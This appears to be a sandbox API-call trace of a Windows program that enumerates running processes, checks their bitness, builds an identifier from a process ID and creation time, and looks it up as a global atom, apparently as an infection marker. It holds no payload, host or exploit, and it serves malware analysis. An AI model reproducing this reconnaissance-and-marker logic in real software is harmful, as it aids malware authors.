	[0072.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.497] CloseHandle (hObject=0x224) returned 1
	[0072.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.497] CloseHandle (hObject=0x224) returned 1
	[0072.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.497] CloseHandle (hObject=0x224) returned 1
	[0072.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.497] CloseHandle (hObject=0x224) returned 1
	[0072.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e8b0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.498] CloseHandle (hObject=0x224) returned 1
	[0072.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.498] CloseHandle (hObject=0x224) returned 1
	[0072.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.498] CloseHandle (hObject=0x224) returned 1
	[0072.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.498] CloseHandle (hObject=0x224) returned 1
	[0072.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.498] CloseHandle (hObject=0x224) returned 1
	[0072.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.499] CloseHandle (hObject=0x224) returned 1
	[0072.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.499] CloseHandle (hObject=0x224) returned 1
	[0072.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.499] CloseHandle (hObject=0x224) returned 1
	[0072.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.499] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.500] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.500] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.500] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.501] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetLastError () returned 0x5
	[0072.502] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.502] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.503] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.503] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.503] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.503] CloseHandle (hObject=0x224) returned 1
	[0072.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.503] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.503] CloseHandle (hObject=0x224) returned 1
	[0072.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e888, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.503] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.503] CloseHandle (hObject=0x224) returned 1
	[0072.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16db8) returned 0xc0000004
	[0072.551] VirtualAlloc (lpAddress=0x0, dwSize=0x16eb8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16eb8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.556] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.556] CloseHandle (hObject=0x224) returned 1
	[0072.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728998, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.557] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.557] CloseHandle (hObject=0x224) returned 1
	[0072.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.557] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.557] CloseHandle (hObject=0x224) returned 1
	[0072.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.558] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.558] CloseHandle (hObject=0x224) returned 1
	[0072.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.558] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.558] CloseHandle (hObject=0x224) returned 1
